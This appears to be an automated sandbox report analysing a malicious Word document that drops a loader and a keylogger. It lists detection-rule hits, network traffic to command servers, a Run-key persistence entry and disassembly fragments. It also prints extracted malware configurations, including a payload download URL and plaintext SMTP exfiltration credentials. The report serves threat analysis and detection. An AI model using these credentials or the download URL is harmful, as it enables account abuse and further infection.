Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 7368, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 7716, ProcessName: npratlsN.pif

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 1812, TargetFilename: C:\Windows\SysWOW64\brightness.exe

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7368, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.247.73, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 7716, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49758

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7368, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 7368, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 7716, ProcessName: npratlsN.pif

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49711, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 1812, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 7716, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49934

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T08:25:25.488734+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	166.62.27.188	443	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T08:25:35.893583+0100	2803305	3	Unknown Traffic	192.168.2.5	49779	104.21.80.1	443	TCP
2025-01-16T08:25:40.797543+0100	2803305	3	Unknown Traffic	192.168.2.5	49814	104.21.80.1	443	TCP
2025-01-16T08:25:42.151370+0100	2803305	3	Unknown Traffic	192.168.2.5	49827	104.21.80.1	443	TCP
2025-01-16T08:25:44.858840+0100	2803305	3	Unknown Traffic	192.168.2.5	49842	104.21.80.1	443	TCP
2025-01-16T08:25:47.236592+0100	2803305	3	Unknown Traffic	192.168.2.5	49858	104.21.80.1	443	TCP
2025-01-16T08:25:49.858794+0100	2803305	3	Unknown Traffic	192.168.2.5	49878	104.21.80.1	443	TCP
2025-01-16T08:25:51.293173+0100	2803305	3	Unknown Traffic	192.168.2.5	49889	104.21.80.1	443	TCP
2025-01-16T08:25:52.927070+0100	2803305	3	Unknown Traffic	192.168.2.5	49901	104.21.80.1	443	TCP
2025-01-16T08:25:54.227929+0100	2803305	3	Unknown Traffic	192.168.2.5	49908	104.21.80.1	443	TCP
2025-01-16T08:25:55.567405+0100	2803305	3	Unknown Traffic	192.168.2.5	49921	104.21.80.1	443	TCP
2025-01-16T08:25:57.527764+0100	2803305	3	Unknown Traffic	192.168.2.5	49935	104.21.80.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T08:25:34.041600+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49758	132.226.247.73	80	TCP
2025-01-16T08:25:35.338509+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49758	132.226.247.73	80	TCP
2025-01-16T08:25:37.619409+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49785	132.226.247.73	80	TCP
2025-01-16T08:25:38.916288+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49796	132.226.247.73	80	TCP
2025-01-16T08:25:48.129975+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49863	132.226.247.73	80	TCP
2025-01-16T08:25:49.286280+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49863	132.226.247.73	80	TCP
2025-01-16T08:25:50.587795+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49883	132.226.247.73	80	TCP
2025-01-16T08:25:55.831084+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49915	132.226.247.73	80	TCP
2025-01-16T08:25:56.971678+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49915	132.226.247.73	80	TCP
2025-01-16T08:25:58.252943+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49941	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-16T08:25:48.166873+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49865	149.154.167.220	443	TCP
2025-01-16T08:26:02.407941+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49976	149.154.167.220	443	TCP
2025-01-16T08:26:09.511604+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	50038	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PI ITS15235 (2).doc

Avira: detected

Antivirus detection for URL or domain

Source: https://amazonenviro.com:443/admin/245_Nsltarpncon	Avira URL Cloud: Label: malware
Source: https://amazonenviro.com/admin/245_Nsltarpncon	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Avira: detection malicious, Label: HEUR/AGEN.1325914
Source: C:\Windows\SysWOW64\brightness.exe	Avira: detection malicious, Label: HEUR/AGEN.1325914

Found malware configuration

Source: 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
Source: 17.2.npratlsN.pif.2aa40000.3.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}
Source: 7.0.brightness.exe.400000.0.unpack	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://amazonenviro.com/admin/245_Nsltarpncon"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Nsltarpn.PIF	ReversingLabs: Detection: 44%
Source: C:\Windows \SysWOW64\NETUTILS.dll	ReversingLabs: Detection: 60%
Source: C:\Windows\SysWOW64\brightness.exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: PI ITS15235 (2).doc	Virustotal: Detection: 60%			Perma Link
Source: PI ITS15235 (2).doc	ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Windows \SysWOW64\NETUTILS.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PI ITS15235 (2).doc

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 13.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 15.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 17.2.npratlsN.pif.400000.0.unpack

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49772 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49872 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49928 version: TLS 1.0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:50038 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216325218.000000007F650000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.7.dr
Source:	Binary string: _.pdb source: npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3846855423.000000001AC41000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2257670343.000000001AC43000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000007.00000003.2237481198.00000000212D2000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2237481198.0000000021301000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216325218.000000007F650000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.7.dr

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02785908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

7_2_02785908

Software Vulnerabilities

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: brightness.exe.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\brightness.exe

Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	13_2_1C87DD08
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 1F90F2B5h	13_2_1F90F0D7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 1F90FC3Fh	13_2_1F90F0D7
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 1F90E0C5h	13_2_1F90DF1B
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_1F90E5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 1F90E0C5h	13_2_1F90E114
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209C185Dh	13_2_209C1440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CB829h	13_2_209CB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209C10E9h	13_2_209C0E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CD239h	13_2_209CCF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CDF41h	13_2_209CDC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CE399h	13_2_209CE0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209C185Dh	13_2_209C1431
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CDAE9h	13_2_209CD840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CEC49h	13_2_209CE9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CBC81h	13_2_209CB9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CF0A1h	13_2_209CEDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CE7F1h	13_2_209CE548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CC531h	13_2_209CC288
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CF951h	13_2_209CF6A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CC989h	13_2_209CC6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CC0D9h	13_2_209CBE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CF4F9h	13_2_209CF250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209C185Dh	13_2_209C178B
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CD691h	13_2_209CD3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CFDA9h	13_2_209CFB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209CCDE1h	13_2_209CCB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D7DC0h	13_2_209D7AF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DEA7Eh	13_2_209DE7B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D68FDh	13_2_209D65C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D0FF1h	13_2_209D0D48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D0741h	13_2_209D0498
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DE15Eh	13_2_209DDE90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D5B61h	13_2_209D58B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DA17Eh	13_2_209D9EB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D2151h	13_2_209D1EA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DC16Eh	13_2_209DBEA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D517Bh	13_2_209D4ED0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DF39Eh	13_2_209DF0D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D3769h	13_2_209D34C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DB3BEh	13_2_209DB0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D0B99h	13_2_209D08F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DD3AEh	13_2_209DD0E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DBCDEh	13_2_209DBA10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DDCCEh	13_2_209DDA00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D48C9h	13_2_209D4620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D1CF9h	13_2_209D1A50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DCF1Eh	13_2_209DCC50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DEF0Eh	13_2_209DEC40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D02E9h	13_2_209D0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D4D21h	13_2_209D4A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D3311h	13_2_209D3068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DAF2Eh	13_2_209DAC60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D5709h	13_2_209D5460
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov esp, ebp	13_2_209D9B90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DB84Eh	13_2_209DB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D1449h	13_2_209D11A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DAA9Eh	13_2_209DA7D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D4471h	13_2_209D41C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DCA8Eh	13_2_209DC7C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D18A1h	13_2_209D15F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DFCBEh	13_2_209DF9F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D3BC1h	13_2_209D3918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D5FB9h	13_2_209D5D10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DC5FEh	13_2_209DC330
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DE5EEh	13_2_209DE320
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DA60Eh	13_2_209DA340
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D701Ah	13_2_209D6F70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D4019h	13_2_209D3D70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DD83Eh	13_2_209DD570
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D701Ah	13_2_209D6F69
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209D6411h	13_2_209D6168
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 209DF82Eh	13_2_209DF560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A452A0h	13_2_20A44FA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A44C77h	13_2_20A44908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4C098h	13_2_20A4BDA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A43076h	13_2_20A42DA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4EBA0h	13_2_20A4E8A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A47DA8h	13_2_20A47AB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A41086h	13_2_20A40DB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4A8B0h	13_2_20A4A5B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4AD78h	13_2_20A4AA80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A42756h	13_2_20A42488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4D880h	13_2_20A4D588
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A46A88h	13_2_20A46790
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A49590h	13_2_20A49298
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4E6D8h	13_2_20A4E3E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A442B6h	13_2_20A43FE8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A478E0h	13_2_20A475E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4A3E8h	13_2_20A4A0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A422C6h	13_2_20A41FF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4CEF0h	13_2_20A4CBF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4D3B8h	13_2_20A4D0C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A43996h	13_2_20A436C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A465C0h	13_2_20A462C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A40777h	13_2_20A404D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A490C8h	13_2_20A48DD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A419A6h	13_2_20A416D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4BBD0h	13_2_20A4B8D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A47418h	13_2_20A47120
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A40BF6h	13_2_20A40928
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A49F20h	13_2_20A49C28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4CA28h	13_2_20A4C730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A43507h	13_2_20A43238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A45C30h	13_2_20A45938
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4F530h	13_2_20A4F238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A460F8h	13_2_20A45E00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4F9F8h	13_2_20A4F700
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A48C00h	13_2_20A48908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4B708h	13_2_20A4B410
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A42BE6h	13_2_20A42918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4E210h	13_2_20A4DF18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A49A58h	13_2_20A49760
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A41E36h	13_2_20A41B68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4C560h	13_2_20A4C268
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A45768h	13_2_20A45470
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4F069h	13_2_20A4ED70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A44746h	13_2_20A44478
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A48270h	13_2_20A47F78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4030Eh	13_2_20A40040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A48738h	13_2_20A48440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A41516h	13_2_20A41248
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4B240h	13_2_20A4AF48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A4DD48h	13_2_20A4DA50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A43E26h	13_2_20A43B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A46F50h	13_2_20A46C58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A70CC8h	13_2_20A709D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A70338h	13_2_20A70040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 20A70800h	13_2_20A70508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_20A8FAB5
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_20A8FAD8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	13_2_20A8FDEE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then push 00000000h	13_2_20BE482F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	13_2_21293B64
